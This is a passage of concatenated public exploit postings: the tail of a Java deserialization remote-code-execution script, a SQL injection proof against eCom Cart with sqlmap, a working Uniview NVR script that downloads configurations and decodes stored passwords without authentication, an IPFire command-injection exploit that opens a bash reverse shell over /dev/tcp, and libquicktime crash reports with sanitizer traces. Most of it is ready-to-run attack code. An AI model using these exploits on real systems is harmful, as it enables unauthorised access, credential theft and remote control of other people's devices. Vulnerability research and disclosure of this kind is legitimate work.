69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74'
data2 += '\x00' + chr(cmdlen)
data2 += cmd
data2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f'
return data2
def sslMode():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")
def exploitTarget(sock):
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
print 'sending exploit headers\n'
sock.send(getHeader())
sock.recv(8192)
print 'sending exploit\n'
sock.send(payload())
sock.close()
print 'exploit completed.'
if __name__ == "__main__":
if len(sys.argv) != 5:
print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
sys.exit(0)
else:
sock = None
if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True:
sock = sslMode()
if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
exploitTarget(sock)
# Exploit Title: eCom Cart 1.3 Exploit
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
# Date: 10.06.2017
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Version: 1.3
# Tested on: Linux
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1 in
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')
#1 {main}
thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs
#Uniview NVR remote passwords disclosure
#Author: B1t
# The Uniview NVR web application does not enforce authorizations on the main.cgi file when requesting json data.
# It says that you can do anything without authentication, however you must know the request structure.
# In addition, the users' passwords are both hashed and also stored in a reversible way
# The POC below remotely downloads the device's configuration file, extracts the credentials
# and decodes the reversible password strings using my crafted map
# It is worth mention that when you login, the javascript hashes the password with MD5 and pass the request.
# If the script does retrieve the hash and not the password, you can intercept the request and replace the generated
# MD5 with the one disclosed using this script
# Tested on the following models:
# NVR304-16E - Software Version B3118P26C00510
# NVR301-08-P8 - Software Version B3218P26C00512
#=09=09=09=09=09=09and version B3220P11
#
# Other versions may also be affected
#Usage: python nvr-pwd-disc.py http://Host_or_IP:PORT
# Run example:
# root@k4li:~# python nvr-pwd-disc.py http://192.168.1.5
#
# Uniview NVR remote passwords disclosure!
# Author: B1t
#
# [+] Getting model name and software version...
# Model: NVR301-08-P8
# Software Version: B3218P26C00512
#
# [+] Getting configuration file...
# [+] Number of users found: 4
#
# [+] Extracting users' hashes and decoding reversible strings:
#
# User =09|=09 Hash =09|=09 Password
# _________________________________________________
# admin =09|=093b9c687b1f4b9d87ed0fdd6abbf7e33d =09|=09<TRIMMED>
# default =09|=09 =09|=09||||||||||||||||||||
# HAUser =09|=09288b836a37578141fea6527b5e190120 =09|=09123HAUser123[err
# test =09|=0951b2454c681f3205f63b8372096d990b =09|=09AA123pqrstuvwxyz
#
# *Note that the users 'default' and 'HAUser' are default and sometimes in=
accessible remotely
import requests
import xml.etree.ElementTree
import sys
print "\r\nUniview NVR remote passwords disclosure!"
print "Author: B1t\r\n"
def decode_pass(rev_pass):
pass_dict =3D {'77': '1', '78': '2', '79': '3', '72': '4', '73': '5', '=
74': '6', '75': '7', '68': '8', '69': '9',
'76': '0', '93': '!', '60': '@', '95': '#', '88': '$', '89=
': '%', '34': '^', '90': '&', '86': '*',
'84': '(', '85': ')', '81': '-', '35': '_', '65': '=3D', '=
87': '+', '83': '/', '32': '\\', '0': '|',
'80': ',', '70': ':', '71': ';', '7': '{', '1': '}', '82':=
'.', '67': '?', '64': '<', '66': '>',
'2': '~', '39': '[', '33': ']', '94': '"', '91': "'", '28'=
: '`', '61': 'A', '62': 'B', '63': 'C',
'56': 'D', '57': 'E', '58': 'F', '59': 'G', '52': 'H', '53=
': 'I', '54': 'J', '55': 'K', '48': 'L',
'49': 'M', '50': 'N', '51': 'O', '44': 'P', '45': 'Q', '46=
': 'R', '47': 'S', '40': 'T', '41': 'U',
'42': 'V', '43': 'W', '36': 'X', '37': 'Y', '38': 'Z', '29=
': 'a', '30': 'b', '31': 'c', '24': 'd',
'25': 'e', '26': 'f', '27': 'g', '20': 'h', '21': 'i', '22=
': 'j', '23': 'k', '16': 'l', '17': 'm',
'18': 'n', '19': 'o', '12': 'p', '13': 'q', '14': 'r', '15=
': 's', '8': 't', '9': 'u', '10': 'v',
'11': 'w', '4': 'x', '5': 'y', '6': 'z'}
rev_pass =3D rev_pass.split(";")
pass_len =3D len(rev_pass) - rev_pass.count("124")
password =3D ""
for char in rev_pass:
if char !=3D "124": password =3D password + pass_dict[char]
return pass_len, password
if len(sys.argv) < 2:
print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The =
web interface's port"
print "\r\nExample: " + sys.argv[0] + " http://192.168.1.1:8850"
sys.exit()
elif "http://" not in sys.argv[1] and "https://" not in sys.argv[1]:
=09print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The w=
eb interface's port"
=09sys.exit()
=09
host =3D sys.argv[1]
print "[+] Getting model name and software version..."
r =3D requests.get(host + '/cgi-bin/main-cgi?json=3D{"cmd":%20116}')
if r.status_code !=3D 200:
print "Failed fetching version, got status code: " + r.status_code
print "Model: " + r.text.split('szDevName":=09"')[1].split('",')[0]
print "Software Version: " + r.text.split('szSoftwareVersion":=09"')[1].spl=
it('",')[0]
print "\r\n[+] Getting configuration file..."
r =3D requests.get(host + "/cgi-bin/main-cgi?json=3D{%22cmd%22:255,%22szUse=
rName%22:%22%22,%22u32UserLoginHandle%22:8888888888}")
if r.status_code !=3D 200:
print "Failed fetching configuration file, response code: " + r.status_=
code
sys.exit()
root =3D xml.etree.ElementTree.fromstring(r.text)
print "[+] Number of users found: " + root.find("UserCfg").get("Num")
print "\r\n[+] Extracting users' hashes and decoding reversible strings:"
users =3D root.find("UserCfg").getchildren()
print "\r\nUser \t|\t Hash \t|\t Password"
print "_________________________________________________"
for user in users:
l, p =3D decode_pass(user.get("RvsblePass"))
print user.get("UserName"), "\t|\t", user.get("UserPass"), "\t|\t", p
print "\r\n *Note that the users 'default' and 'HAUser' are default and som=
etimes inaccessible remotely"
#
# Title : IPFire 2.19 Firewall Post-Auth RCE
# Date : 09/06/2017
# Author : 0x09AL (https://twitter.com/0x09AL)
# Tested on: IPFire 2.19 (x86_64) - Core Update 110
# Vendor : http://www.ipfire.org/
# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso
# Vulnerability Description:
# The file ids.cgi doesn't sanitize the OINKCODE parameter and gets passed to a system call which call wget.
# You need valid credentials to exploit this vulnerability or you can exploit it through CSRF.
#
#
import requests
# Adjust the ip and ports.
revhost = '192.168.56.1'
revport = 1337
url = 'https://192.168.56.102:444/cgi-bin/ids.cgi'
username = 'admin'
password = 'admin'
payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1'
evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'}
headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'}
def verifyVuln():
req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed.
if(req.status_code == 200 and "uid=99(nobody)" in req.text):
print "[+] IPFire Installation is Vulnerable [+]"
revShell()
else:
print "[+] Not Vulnerable [+]"
def revShell():
evildata["OINKCODE"] = '`' + payload + '`'
print "[+] Sending Malicious Payload [+]"
req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False)
verifyVuln()
libquicktime multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
The libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.
Affected version:
=====
1.2.4
Vulnerability Description:
==========================
##################################
1.
the quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
POC:
libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
CVE:
CVE-2017-9122
###################################
2.
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
ASAN:SIGSEGV
=================================================================
==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)
==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
#0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)
#1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)
#2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)
#3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14254==ABORTING
debug info:
Program received signal SIGSEGV, Segmentation fault.
...
Stopped reason: SIGSEGV
0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>,
constant=<optimized out>) at lqt_quicktime.c:1242
1242 return
POC:
libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
CVE:
CVE-2017-9123
###################################
3.
the quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
ASAN:SIGSEGV
=================================================================
==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)
==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
#0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)
#1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)
#2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)
#3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)
#4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)
#5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)
#6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)
#7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14359==ABORTING
debug info:
Program received signal SIGSEGV, Segmentation fault.
Stopped reason: SIGSEGV
0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>,
_output=<optimized out>) at util.c:874
874if(input[0] == output[0] &&
POC:
libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
CVE:
CVE-2017-9124
###################################
4.
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
=================================================================
==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528
READ of size 4 at 0x602000009cd4 thread T0
#0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242
#1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138
#2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996
#3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration
Shadow bytes around the buggy address:
0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa
0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa
0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa
0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01
0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa
=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==40038==ABORTING
POC:
libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
CVE:
CVE-2017-9125
###################################
5.
the quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
=================================================================
==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718
WRITE of size 1 at 0x602000009ce4 thread T0
#0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69
#1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147
#2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56
#3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220
#4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
#5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
#6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
#7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
#8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table
Shadow bytes around the buggy address:
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==41637==ABORTING
POC:
libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
CVE:
CVE-2017-9126
###################################
6.
the quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
=================================================================
==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8
WRITE of size 1 at 0x602000009cb1 thread T0
#0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84
#1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557
#2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694
#3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336
#4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231
#5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
#6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
#7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
#8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
#9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom
Shadow bytes around the buggy address:
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
